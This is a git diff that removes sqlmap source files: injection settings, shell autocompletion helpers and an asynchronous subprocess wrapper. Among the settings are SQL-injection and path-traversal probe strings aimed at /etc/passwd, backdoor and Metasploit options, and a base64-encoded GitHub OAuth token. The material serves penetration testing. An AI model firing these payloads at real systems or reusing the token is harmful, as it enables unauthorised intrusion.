timeout for running commands over backdoor -BACKDOOR_RUN_CMD_TIMEOUT = 5 - -# Maximum number of techniques used in inject.py/getValue() per one value -MAX_TECHNIQUES_PER_VALUE = 2 - -# In case of missing piece of partial union dump, buffered array must be flushed after certain size -MAX_BUFFERED_PARTIAL_UNION_LENGTH = 1024 - -# Suffix used for naming meta databases in DBMS(es) without explicit database name -METADB_SUFFIX = "_masterdb" - -# Minimum time response set needed for time-comparison based on standard deviation -MIN_TIME_RESPONSES = 30 - -# Minimum comparison ratio set needed for searching valid union column number based on standard deviation -MIN_UNION_RESPONSES = 5 - -# After these number of blanks at the end inference should stop (just in case) -INFERENCE_BLANK_BREAK = 10 - -# Use this replacement character for cases when inference is not able to retrieve the proper character value -INFERENCE_UNKNOWN_CHAR = '?' - -# Character used for operation "greater" in inference -INFERENCE_GREATER_CHAR = ">" - -# Character used for operation "equals" in inference -INFERENCE_EQUALS_CHAR = "=" - -# Character used for operation "not-equals" in inference -INFERENCE_NOT_EQUALS_CHAR = "!=" - -# String used for representation of unknown DBMS -UNKNOWN_DBMS = "Unknown" - -# String used for representation of unknown DBMS version -UNKNOWN_DBMS_VERSION = "Unknown" - -# Dynamicity mark length used in dynamicity removal engine -DYNAMICITY_MARK_LENGTH = 32 - -# Dummy user prefix used in dictionary attack -DUMMY_USER_PREFIX = "__dummy__" - -# Reference: http://en.wikipedia.org/wiki/ISO/IEC_8859-1 -DEFAULT_PAGE_ENCODING = "iso-8859-1" - -# URL used in dummy runs -DUMMY_URL = "http://foo/bar?id=1" - -# System variables -IS_WIN = subprocess.mswindows - -# The name of the operating system dependent module imported. The following names have currently been registered: 'posix', 'nt', 'mac', 'os2', 'ce', 'java', 'riscos' -PLATFORM = os.name -PYVERSION = sys.version.split()[0] - -# DBMS system databases -MSSQL_SYSTEM_DBS = ("Northwind", "master", "model", "msdb", "pubs", "tempdb") -MYSQL_SYSTEM_DBS = ("information_schema", "mysql") # Before MySQL 5.0 only "mysql" -PGSQL_SYSTEM_DBS = ("information_schema", "pg_catalog", "pg_toast") -ORACLE_SYSTEM_DBS = ("CTXSYS", "DBSNMP", "DMSYS", "EXFSYS", "MDSYS", "OLAPSYS", "ORDSYS", "OUTLN", "SYS", "SYSAUX", "SYSMAN", "SYSTEM", "TSMSYS", "WMSYS", "XDB") # These are TABLESPACE_NAME -SQLITE_SYSTEM_DBS = ("sqlite_master", "sqlite_temp_master") -ACCESS_SYSTEM_DBS = ("MSysAccessObjects", "MSysACEs", "MSysObjects", "MSysQueries", "MSysRelationships", "MSysAccessStorage",\ - "MSysAccessXML", "MSysModules", "MSysModules2") -FIREBIRD_SYSTEM_DBS = ("RDB$BACKUP_HISTORY", "RDB$CHARACTER_SETS", "RDB$CHECK_CONSTRAINTS", "RDB$COLLATIONS", "RDB$DATABASE",\ - "RDB$DEPENDENCIES", "RDB$EXCEPTIONS", "RDB$FIELDS", "RDB$FIELD_DIMENSIONS", " RDB$FILES", "RDB$FILTERS",\ - "RDB$FORMATS", "RDB$FUNCTIONS", "RDB$FUNCTION_ARGUMENTS", "RDB$GENERATORS", "RDB$INDEX_SEGMENTS", "RDB$INDICES",\ - "RDB$LOG_FILES", "RDB$PAGES", "RDB$PROCEDURES", "RDB$PROCEDURE_PARAMETERS", "RDB$REF_CONSTRAINTS", "RDB$RELATIONS",\ - "RDB$RELATION_CONSTRAINTS", "RDB$RELATION_FIELDS", "RDB$ROLES", "RDB$SECURITY_CLASSES", "RDB$TRANSACTIONS", "RDB$TRIGGERS",\ - "RDB$TRIGGER_MESSAGES", "RDB$TYPES", "RDB$USER_PRIVILEGES", "RDB$VIEW_RELATIONS") -MAXDB_SYSTEM_DBS = ("SYSINFO", "DOMAIN") -SYBASE_SYSTEM_DBS = ("master", "model", "sybsystemdb", "sybsystemprocs") -DB2_SYSTEM_DBS = ("NULLID", "SQLJ", "SYSCAT", "SYSFUN", "SYSIBM", "SYSIBMADM", "SYSIBMINTERNAL", "SYSIBMTS",\ - "SYSPROC", "SYSPUBLIC", "SYSSTAT", "SYSTOOLS") -HSQLDB_SYSTEM_DBS = ("INFORMATION_SCHEMA", "SYSTEM_LOB") - -MSSQL_ALIASES = ("microsoft sql server", "mssqlserver", "mssql", "ms") -MYSQL_ALIASES = ("mysql", "my") -PGSQL_ALIASES = ("postgresql", "postgres", "pgsql", "psql", "pg") -ORACLE_ALIASES = ("oracle", "orcl", "ora", "or") -SQLITE_ALIASES = ("sqlite", "sqlite3") -ACCESS_ALIASES = ("msaccess", "access", "jet", "microsoft access") -FIREBIRD_ALIASES = ("firebird", "mozilla firebird", "interbase", "ibase", "fb") -MAXDB_ALIASES = ("maxdb", "sap maxdb", "sap db") -SYBASE_ALIASES = ("sybase", "sybase sql server") -DB2_ALIASES = ("db2", "ibm db2", "ibmdb2") -HSQLDB_ALIASES = ("hsql", "hsqldb", "hs", "hypersql") - -DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) for _ in dir(DBMS) if not _.startswith("_")) - -SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES -SUPPORTED_OS = ("linux", "windows") - -DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES)) - -USER_AGENT_ALIASES = ("ua", "useragent", "user-agent") -REFERER_ALIASES = ("ref", "referer", "referrer") -HOST_ALIASES = ("host",) - -HSQLDB_DEFAULT_SCHEMA = "PUBLIC" - -# Names that can't be used to name files on Windows OS -WINDOWS_RESERVED_NAMES = ("CON", "PRN", "AUX", "NUL", "COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9", "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9") - -# Items displayed in basic help (-h) output -BASIC_HELP_ITEMS = ( - "url", - "googleDork", - "data", - "cookie", - "randomAgent", - "proxy", - "testParameter", - "dbms", - "level", - "risk", - "tech", - "getAll", - "getBanner", - "getCurrentUser", - "getCurrentDb", - "getPasswordHashes", - "getTables", - "getColumns", - "getSchema", - "dumpTable", - "dumpAll", - "db", - "tbl", - "col", - "osShell", - "osPwn", - "batch", - "checkTor", - "flushSession", - "tor", - "sqlmapShell", - "wizard", - ) - -# String representation for NULL value -NULL = "NULL" - -# String representation for blank ('') value -BLANK = "" - -# String representation for current database -CURRENT_DB = "CD" - -# Regular expressions used for parsing error messages (--parse-errors) -ERROR_PARSING_REGEXES = ( - r"[^<]*(fatal|error|warning|exception)[^<]*:?\s*(?P.+?)", - r"(?m)^(fatal|error|warning|exception):?\s*(?P.+?)$", - r"
  • Error Type:
    (?P.+?)
  • ", - r"error '[0-9a-f]{8}'((<[^>]+>)|\s)+(?P[^<>]+)", - ) - -# Regular expression used for parsing charset info from meta html headers -META_CHARSET_REGEX = r'(?si).*]+charset="?(?P[^"> ]+).*' - -# Regular expression used for parsing refresh info from meta html headers -META_REFRESH_REGEX = r'(?si)(?!.*?]+content="?[^">]+url=["\']?(?P[^\'">]+).*' - -# Regular expression used for parsing empty fields in tested form data -EMPTY_FORM_FIELDS_REGEX = r'(&|\A)(?P[^=]+=(&|\Z))' - -# Reference: http://www.cs.ru.nl/bachelorscripties/2010/Martin_Devillers___0437999___Analyzing_password_strength.pdf -COMMON_PASSWORD_SUFFIXES = ("1", "123", "2", "12", "3", "13", "7", "11", "5", "22", "23", "01", "4", "07", "21", "14", "10", "06", "08", "8", "15", "69", "16", "6", "18") - -# Reference: http://www.the-interweb.com/serendipity/index.php?/archives/94-A-brief-analysis-of-40,000-leaked-MySpace-passwords.html -COMMON_PASSWORD_SUFFIXES += ("!", ".", "*", "!!", "?", ";", "..", "!!!", ", ", "@") - -# Splitter used between requests in WebScarab log files -WEBSCARAB_SPLITTER = "### Conversation" - -# Splitter used between requests in BURP log files -BURP_REQUEST_REGEX = r"={10,}\s+[^=]+={10,}\s(.+?)\s={10,}" - -# Regex used for parsing XML Burp saved history items -BURP_XML_HISTORY_REGEX = r'(\d+).+?[^\s=]*%s[^\s]*)\s" - -# Maximum number of threads (avoiding connection issues and/or DoS) -MAX_NUMBER_OF_THREADS = 10 - -# Minimum range between minimum and maximum of statistical set -MIN_STATISTICAL_RANGE = 0.01 - -# Minimum value for comparison ratio -MIN_RATIO = 0.0 - -# Maximum value for comparison ratio -MAX_RATIO = 1.0 - -# Character used for marking injectable position inside provided data -CUSTOM_INJECTION_MARK_CHAR = '*' - -# Other way to declare injection position -INJECT_HERE_MARK = '%INJECT HERE%' - -# Minimum chunk length used for retrieving data over error based payloads -MIN_ERROR_CHUNK_LENGTH = 8 - -# Maximum chunk length used for retrieving data over error based payloads -MAX_ERROR_CHUNK_LENGTH = 1024 - -# Do not escape the injected statement if it contains any of the following SQL keywords -EXCLUDE_UNESCAPE = ("WAITFOR DELAY ", " INTO DUMPFILE ", " INTO OUTFILE ", "CREATE ", "BULK ", "EXEC ", "RECONFIGURE ", "DECLARE ", "'%s'" % CHAR_INFERENCE_MARK) - -# Mark used for replacement of reflected values -REFLECTED_VALUE_MARKER = "__REFLECTED_VALUE__" - -# Regular expression used for replacing border non-alphanum characters -REFLECTED_BORDER_REGEX = r"[^A-Za-z]+" - -# Regular expression used for replacing non-alphanum characters -REFLECTED_REPLACEMENT_REGEX = r".+" - -# Maximum number of alpha-numerical parts in reflected regex (for speed purposes) -REFLECTED_MAX_REGEX_PARTS = 10 - -# Chars which can be used as a failsafe values in case of too long URL encoding value -URLENCODE_FAILSAFE_CHARS = "()|," - -# Maximum length of URL encoded value after which failsafe procedure takes away -URLENCODE_CHAR_LIMIT = 2000 - -# Default schema for Microsoft SQL Server DBMS -DEFAULT_MSSQL_SCHEMA = "dbo" - -# Display hash attack info every mod number of items -HASH_MOD_ITEM_DISPLAY = 11 - -# Maximum integer value -MAX_INT = sys.maxint - -# Options that need to be restored in multiple targets run mode -RESTORE_MERGED_OPTIONS = ("col", "db", "dnsName", "privEsc", "tbl", "regexp", "string", "textOnly", "threads", "timeSec", "tmpPath", "uChar", "user") - -# Parameters to be ignored in detection phase (upper case) -IGNORE_PARAMETERS = ("__VIEWSTATE", "__VIEWSTATEENCRYPTED", "__EVENTARGUMENT", "__EVENTTARGET", "__EVENTVALIDATION", "ASPSESSIONID", "ASP.NET_SESSIONID", "JSESSIONID", "CFID", "CFTOKEN") - -# Regular expression used for recognition of ASP.NET control parameters -ASP_NET_CONTROL_REGEX = r"(?i)\Actl\d+\$" - -# Prefix for Google analytics cookie names -GOOGLE_ANALYTICS_COOKIE_PREFIX = "__UTM" - -# Prefix for configuration overriding environment variables -SQLMAP_ENVIRONMENT_PREFIX = "SQLMAP_" - -# Turn off resume console info to avoid potential slowdowns -TURN_OFF_RESUME_INFO_LIMIT = 20 - -# Strftime format for results file used in multiple target mode -RESULTS_FILE_FORMAT = "results-%m%d%Y_%I%M%p.csv" - -# Official web page with the list of Python supported codecs -CODECS_LIST_PAGE = "http://docs.python.org/library/codecs.html#standard-encodings" - -# Simple regular expression used to distinguish scalar from multiple-row commands (not sole condition) -SQL_SCALAR_REGEX = r"\A(SELECT(?!\s+DISTINCT\(?))?\s*\w*\(" - -# Option/switch values to ignore during configuration save -IGNORE_SAVE_OPTIONS = ("saveConfig",) - -# IP address of the localhost -LOCALHOST = "127.0.0.1" - -# Default port used by Tor -DEFAULT_TOR_SOCKS_PORT = 9050 - -# Default ports used in Tor proxy bundles -DEFAULT_TOR_HTTP_PORTS = (8123, 8118) - -# Percentage below which comparison engine could have problems -LOW_TEXT_PERCENT = 20 - -# These MySQL keywords can't go (alone) into versioned comment form (/*!...*/) -# Reference: http://dev.mysql.com/doc/refman/5.1/en/function-resolution.html -IGNORE_SPACE_AFFECTED_KEYWORDS = ("CAST", "COUNT", "EXTRACT", "GROUP_CONCAT", "MAX", "MID", "MIN", "SESSION_USER", "SUBSTR", "SUBSTRING", "SUM", "SYSTEM_USER", "TRIM") - -LEGAL_DISCLAIMER = "Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program" - -# After this number of misses reflective removal mechanism is turned off (for speed up reasons) -REFLECTIVE_MISS_THRESHOLD = 20 - -# Regular expression used for extracting HTML title -HTML_TITLE_REGEX = "(?P<result>[^<]+)" - -# Table used for Base64 conversion in WordPress hash cracking routine -ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" - -PICKLE_REDUCE_WHITELIST = (types.BooleanType, types.DictType, types.FloatType, types.IntType, types.ListType, types.LongType, types.NoneType, types.StringType, types.TupleType, types.UnicodeType, types.XRangeType, type(AttribDict()), type(set())) - -# Chars used to quickly distinguish if the user provided tainted parameter values -DUMMY_SQL_INJECTION_CHARS = ";()'" - -# Simple check against dummy users -DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b|\bSELECT\b.+\bFROM\b|\b(CONCAT|information_schema|SLEEP|DELAY)\b" - -# Extensions skipped by crawler -CRAWL_EXCLUDE_EXTENSIONS = ("gif", "jpg", "jpeg", "image", "jar", "tif", "bmp", "war", "ear", "mpg", "mpeg", "wmv", "mpeg", "scm", "iso", "dmp", "dll", "cab", "so", "avi", "mkv", "bin", "iso", "tar", "png", "pdf", "ps", "wav", "mp3", "mp4", "au", "aiff", "aac", "zip", "rar", "7z", "gz", "flv", "mov", "doc", "docx", "xls", "dot", "dotx", "xlt", "xlsx", "ppt", "pps", "pptx") - -# Patterns often seen in HTTP headers containing custom injection marking character -PROBLEMATIC_CUSTOM_INJECTION_PATTERNS = r"(;q=[^;']+)|(\*/\*)" - -# Template used for common table existence check -BRUTE_TABLE_EXISTS_TEMPLATE = "EXISTS(SELECT %d FROM %s)" - -# Template used for common column existence check -BRUTE_COLUMN_EXISTS_TEMPLATE = "EXISTS(SELECT %s FROM %s)" - -# Payload used for checking of existence of IDS/WAF (dummier the better) -IDS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd" - -# Data inside shellcodeexec to be filled with random string -SHELLCODEEXEC_RANDOM_STRING_MARKER = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" - -# Vectors used for provoking specific WAF/IDS/IPS behavior(s) -WAF_ATTACK_VECTORS = ( - "", # NIL - "search=", - "file=../../../../etc/passwd", - "q=foobar", - "id=1 %s" % IDS_WAF_CHECK_PAYLOAD - ) - -# Used for status representation in dictionary attack phase -ROTATING_CHARS = ('\\', '|', '|', '/', '-') - -# Approximate chunk length (in bytes) used by BigArray objects (only last chunk and cached one are held in memory) -BIGARRAY_CHUNK_SIZE = 1024 * 1024 - -# Maximum number of socket pre-connects -SOCKET_PRE_CONNECT_QUEUE_SIZE = 3 - -# Only console display last n table rows -TRIM_STDOUT_DUMP_SIZE = 256 - -# Reference: http://stackoverflow.com/a/3168436 -# Reference: https://support.microsoft.com/en-us/kb/899149 -DUMP_FILE_BUFFER_SIZE = 1024 - -# Parse response headers only first couple of times -PARSE_HEADERS_LIMIT = 3 - -# Step used in ORDER BY technique used for finding the right number of columns in UNION query injections -ORDER_BY_STEP = 10 - -# Maximum number of times for revalidation of a character in time-based injections -MAX_TIME_REVALIDATION_STEPS = 5 - -# Characters that can be used to split parameter values in provided command line (e.g. in --tamper) -PARAMETER_SPLITTING_REGEX = r'[,|;]' - -# Regular expression describing possible union char value (e.g. used in --union-char) -UNION_CHAR_REGEX = r'\A\w+\Z' - -# Attribute used for storing original parameter value in special cases (e.g. POST) -UNENCODED_ORIGINAL_VALUE = 'original' - -# Common column names containing usernames (used for hash cracking in some cases) -COMMON_USER_COLUMNS = ('user', 'username', 'user_name', 'benutzername', 'benutzer', 'utilisateur', 'usager', 'consommateur', 'utente', 'utilizzatore', 'usufrutuario', 'korisnik', 'usuario', 'consumidor') - -# Default delimiter in GET/POST values -DEFAULT_GET_POST_DELIMITER = '&' - -# Default delimiter in cookie values -DEFAULT_COOKIE_DELIMITER = ';' - -# Unix timestamp used for forcing cookie expiration when provided with --load-cookies -FORCE_COOKIE_EXPIRATION_TIME = "9999999999" - -# Github OAuth token used for creating an automatic Issue for unhandled exceptions -GITHUB_REPORT_OAUTH_TOKEN = "YzNkYTgyMTdjYzdjNjZjMjFjMWE5ODI5OGQyNzk2ODM1M2M0MzUyOA==" - -# Skip unforced HashDB flush requests below the threshold number of cached items -HASHDB_FLUSH_THRESHOLD = 32 - -# Number of retries for unsuccessful HashDB flush attempts -HASHDB_FLUSH_RETRIES = 3 - -# Number of retries for unsuccessful HashDB end transaction attempts -HASHDB_END_TRANSACTION_RETRIES = 3 - -# Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism) -HASHDB_MILESTONE_VALUE = "JHjrBugdDA" # "".join(random.sample(string.ascii_letters, 10)) - -# Warn user of possible delay due to large page dump in full UNION query injections -LARGE_OUTPUT_THRESHOLD = 1024 ** 2 - -# On huge tables there is a considerable slowdown if every row retrieval requires ORDER BY (most noticable in table dumping using ERROR injections) -SLOW_ORDER_COUNT_THRESHOLD = 10000 - -# Give up on hash recognition if nothing was found in first given number of rows -HASH_RECOGNITION_QUIT_THRESHOLD = 10000 - -# Maximum number of redirections to any single URL - this is needed because of the state that cookies introduce -MAX_SINGLE_URL_REDIRECTIONS = 4 - -# Maximum total number of redirections (regardless of URL) - before assuming we're in a loop -MAX_TOTAL_REDIRECTIONS = 10 - -# Reference: http://www.tcpipguide.com/free/t_DNSLabelsNamesandSyntaxRules.htm -MAX_DNS_LABEL = 63 - -# Alphabet used for prefix and suffix strings of name resolution requests in DNS technique (excluding hexadecimal chars for not mixing with inner content) -DNS_BOUNDARIES_ALPHABET = re.sub("[a-fA-F]", "", string.ascii_letters) - -# Alphabet used for heuristic checks -HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', ',', '.') - -# String used for dummy non-SQLi (e.g. XSS) heuristic checks of a tested parameter value -DUMMY_NON_SQLI_CHECK_APPENDIX = "<'\">" - -# Length of prefix and suffix used in non-SQLI heuristic checks -NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6 - -# Connection chunk size (processing large responses in chunks to avoid MemoryError crashes - e.g. large table dump in full UNION injections) -MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024 - -# Maximum response total page size (trimmed if larger) -MAX_CONNECTION_TOTAL_SIZE = 100 * 1024 * 1024 - -# Maximum (multi-threaded) length of entry in bisection algorithm -MAX_BISECTION_LENGTH = 50 * 1024 * 1024 - -# Mark used for trimming unnecessary content in large chunks -LARGE_CHUNK_TRIM_MARKER = "__TRIMMED_CONTENT__" - -# Generic SQL comment formation -GENERIC_SQL_COMMENT = "-- -" - -# Threshold value for turning back on time auto-adjustment mechanism -VALID_TIME_CHARS_RUN_THRESHOLD = 100 - -# Check for empty columns only if table is sufficiently large -CHECK_ZERO_COLUMNS_THRESHOLD = 10 - -# Boldify all logger messages containing these "patterns" -BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CloudFlare") - -# Generic www root directory names -GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www") - -# Maximum length of a help part containing switch/option name(s) -MAX_HELP_OPTION_LENGTH = 18 - -# Maximum number of connection retries (to prevent problems with recursion) -MAX_CONNECT_RETRIES = 100 - -# Strings for detecting formatting errors -FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Failed to convert", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal") - -# Regular expression used for extracting ASP.NET view state values -VIEWSTATE_REGEX = r'(?i)(?P__VIEWSTATE[^"]*)[^>]+value="(?P[^"]+)' - -# Regular expression used for extracting ASP.NET event validation values -EVENTVALIDATION_REGEX = r'(?i)(?P__EVENTVALIDATION[^"]*)[^>]+value="(?P[^"]+)' - -# Number of rows to generate inside the full union test for limited output (mustn't be too large to prevent payload length problems) -LIMITED_ROWS_TEST_NUMBER = 15 - -# Default adapter to use for bottle server -RESTAPI_DEFAULT_ADAPTER = "wsgiref" - -# Default REST-JSON API server listen address -RESTAPI_DEFAULT_ADDRESS = "127.0.0.1" - -# Default REST-JSON API server listen port -RESTAPI_DEFAULT_PORT = 8775 - -# Format used for representing invalid unicode characters -INVALID_UNICODE_CHAR_FORMAT = r"\x%02x" - -# Regular expression for XML POST data -XML_RECOGNITION_REGEX = r"(?s)\A\s*<[^>]+>(.+>)?\s*\Z" - -# Regular expression used for detecting JSON POST data -JSON_RECOGNITION_REGEX = r'(?s)\A(\s*\[)*\s*\{.*"[^"]+"\s*:\s*("[^"]+"|\d+).*\}\s*(\]\s*)*\Z' - -# Regular expression used for detecting JSON-like POST data -JSON_LIKE_RECOGNITION_REGEX = r"(?s)\A(\s*\[)*\s*\{.*'[^']+'\s*:\s*('[^']+'|\d+).*\}\s*(\]\s*)*\Z" - -# Regular expression used for detecting multipart POST data -MULTIPART_RECOGNITION_REGEX = r"(?i)Content-Disposition:[^;]+;\s*name=" - -# Regular expression used for detecting Array-like POST data -ARRAY_LIKE_RECOGNITION_REGEX = r"(\A|%s)(\w+)\[\]=.+%s\2\[\]=" % (DEFAULT_GET_POST_DELIMITER, DEFAULT_GET_POST_DELIMITER) - -# Default POST data content-type -DEFAULT_CONTENT_TYPE = "application/x-www-form-urlencoded; charset=utf-8" - -# Raw text POST data content-type -PLAIN_TEXT_CONTENT_TYPE = "text/plain; charset=utf-8" - -# Length used while checking for existence of Suhosin-patch (like) protection mechanism -SUHOSIN_MAX_VALUE_LENGTH = 512 - -# Minimum size of an (binary) entry before it can be considered for dumping to disk -MIN_BINARY_DISK_DUMP_SIZE = 100 - -# Regular expression used for extracting form tags -FORM_SEARCH_REGEX = r"(?si)" - -# Maximum number of lines to save in history file -MAX_HISTORY_LENGTH = 1000 - -# Minimum field entry length needed for encoded content (hex, base64,...) check -MIN_ENCODED_LEN_CHECK = 5 - -# Timeout in seconds in which Metasploit remote session has to be initialized -METASPLOIT_SESSION_TIMEOUT = 300 - -# Reference: http://www.postgresql.org/docs/9.0/static/catalog-pg-largeobject.html -LOBLKSIZE = 2048 - -# Suffix used to mark variables having keyword names -EVALCODE_KEYWORD_SUFFIX = "_KEYWORD" - -# Reference: http://www.cookiecentral.com/faq/#3.5 -NETSCAPE_FORMAT_HEADER_COOKIES = "# Netscape HTTP Cookie File." - -# Infixes used for automatic recognition of parameters carrying anti-CSRF tokens -CSRF_TOKEN_PARAMETER_INFIXES = ("csrf", "xsrf") - -# Prefixes used in brute force search for web server document root -BRUTE_DOC_ROOT_PREFIXES = { - OS.LINUX: ("/var/www", "/usr/local/apache", "/usr/local/apache2", "/usr/local/www/apache22", "/usr/local/www/apache24", "/usr/local/httpd", "/var/www/nginx-default", "/srv/www", "/var/www/%TARGET%", "/var/www/vhosts/%TARGET%", "/var/www/virtual/%TARGET%", "/var/www/clients/vhosts/%TARGET%", "/var/www/clients/virtual/%TARGET%"), - OS.WINDOWS: ("/xampp", "/Program Files/xampp", "/wamp", "/Program Files/wampp", "/apache", "/Program Files/Apache Group/Apache", "/Program Files/Apache Group/Apache2", "/Program Files/Apache Group/Apache2.2", "/Program Files/Apache Group/Apache2.4", "/Inetpub/wwwroot", "/Inetpub/wwwroot/%TARGET%", "/Inetpub/vhosts/%TARGET%") -} - -# Suffixes used in brute force search for web server document root -BRUTE_DOC_ROOT_SUFFIXES = ("", "html", "htdocs", "httpdocs", "php", "public", "src", "site", "build", "web", "data", "sites/all", "www/build") - -# String used for marking target name inside used brute force web server document root -BRUTE_DOC_ROOT_TARGET_MARK = "%TARGET%" - -# Character used as a boundary in kb.chars (preferably less frequent letter) -KB_CHARS_BOUNDARY_CHAR = 'q' - -# Letters of lower frequency used in kb.chars -KB_CHARS_LOW_FREQUENCY_ALPHABET = "zqxjkvbp" - -# CSS style used in HTML dump format -HTML_DUMP_CSS_STYLE = """""" diff --git a/lib/core/shell.py b/lib/core/shell.py deleted file mode 100644 index 65d096d3..00000000 --- a/lib/core/shell.py +++ /dev/null @@ -1,132 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import atexit -import os - -from lib.core import readlineng as readline -from lib.core.data import logger -from lib.core.data import paths -from lib.core.enums import AUTOCOMPLETE_TYPE -from lib.core.enums import OS -from lib.core.settings import MAX_HISTORY_LENGTH - -try: - import rlcompleter - - class CompleterNG(rlcompleter.Completer): - def global_matches(self, text): - """ - Compute matches when text is a simple name. - Return a list of all names currently defined in self.namespace - that match. - """ - - matches = [] - n = len(text) - - for ns in (self.namespace,): - for word in ns: - if word[:n] == text: - matches.append(word) - - return matches -except: - readline._readline = None - -def readlineAvailable(): - """ - Check if the readline is available. By default - it is not in Python default installation on Windows - """ - - return readline._readline is not None - -def clearHistory(): - if not readlineAvailable(): - return - - readline.clear_history() - -def saveHistory(completion=None): - if not readlineAvailable(): - return - - if completion == AUTOCOMPLETE_TYPE.SQL: - historyPath = paths.SQL_SHELL_HISTORY - elif completion == AUTOCOMPLETE_TYPE.OS: - historyPath = paths.OS_SHELL_HISTORY - else: - historyPath = paths.SQLMAP_SHELL_HISTORY - - try: - with open(historyPath, "w+"): - pass - except: - pass - - readline.set_history_length(MAX_HISTORY_LENGTH) - try: - readline.write_history_file(historyPath) - except IOError, msg: - warnMsg = "there was a problem writing the history file '%s' (%s)" % (historyPath, msg) - logger.warn(warnMsg) - -def loadHistory(completion=None): - if not readlineAvailable(): - return - - clearHistory() - - if completion == AUTOCOMPLETE_TYPE.SQL: - historyPath = paths.SQL_SHELL_HISTORY - elif completion == AUTOCOMPLETE_TYPE.OS: - historyPath = paths.OS_SHELL_HISTORY - else: - historyPath = paths.SQLMAP_SHELL_HISTORY - - if os.path.exists(historyPath): - try: - readline.read_history_file(historyPath) - except IOError, msg: - warnMsg = "there was a problem loading the history file '%s' (%s)" % (historyPath, msg) - logger.warn(warnMsg) - -def autoCompletion(completion=None, os=None, commands=None): - if not readlineAvailable(): - return - - if completion == AUTOCOMPLETE_TYPE.OS: - if os == OS.WINDOWS: - # Reference: http://en.wikipedia.org/wiki/List_of_DOS_commands - completer = CompleterNG({ - "copy": None, "del": None, "dir": None, - "echo": None, "md": None, "mem": None, - "move": None, "net": None, "netstat -na": None, - "ver": None, "xcopy": None, "whoami": None, - }) - - else: - # Reference: http://en.wikipedia.org/wiki/List_of_Unix_commands - completer = CompleterNG({ - "cp": None, "rm": None, "ls": None, - "echo": None, "mkdir": None, "free": None, - "mv": None, "ifconfig": None, "netstat -natu": None, - "pwd": None, "uname": None, "id": None, - }) - - readline.set_completer(completer.complete) - readline.parse_and_bind("tab: complete") - - elif commands: - completer = CompleterNG(dict(((_, None) for _ in commands))) - readline.set_completer_delims(' ') - readline.set_completer(completer.complete) - readline.parse_and_bind("tab: complete") - - loadHistory(completion) - atexit.register(saveHistory, completion) diff --git a/lib/core/subprocessng.py b/lib/core/subprocessng.py deleted file mode 100644 index 236469a1..00000000 --- a/lib/core/subprocessng.py +++ /dev/null @@ -1,202 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import errno -import os -import subprocess -import sys -import time - -from lib.core.settings import IS_WIN - -if IS_WIN: - try: - from win32file import ReadFile, WriteFile - from win32pipe import PeekNamedPipe - except ImportError: - pass - import msvcrt -else: - import select - import fcntl - - if (sys.hexversion >> 16) >= 0x202: - FCNTL = fcntl - else: - import FCNTL - -def blockingReadFromFD(fd): - # Quick twist around original Twisted function - # Blocking read from a non-blocking file descriptor - output = "" - - while True: - try: - output += os.read(fd, 8192) - except (OSError, IOError), ioe: - if ioe.args[0] in (errno.EAGAIN, errno.EINTR): - # Uncomment the following line if the process seems to - # take a huge amount of cpu time - # time.sleep(0.01) - continue - else: - raise - break - - if not output: - raise EOFError("fd %s has been closed." % fd) - - return output - -def blockingWriteToFD(fd, data): - # Another quick twist - while True: - try: - data_length = len(data) - wrote_data = os.write(fd, data) - except (OSError, IOError), io: - if io.errno in (errno.EAGAIN, errno.EINTR): - continue - else: - raise - - if wrote_data < data_length: - blockingWriteToFD(fd, data[wrote_data:]) - - break - -# the following code is taken from http://code.activestate.com/recipes/440554-module-to-allow-asynchronous-subprocess-use-on-win/ -class Popen(subprocess.Popen): - def recv(self, maxsize=None): - return self._recv('stdout', maxsize) - - def recv_err(self, maxsize=None): - return self._recv('stderr', maxsize) - - def send_recv(self, input='', maxsize=None): - return self.send(input), self.recv(maxsize), self.recv_err(maxsize) - - def get_conn_maxsize(self, which, maxsize): - if maxsize is None: - maxsize = 1024 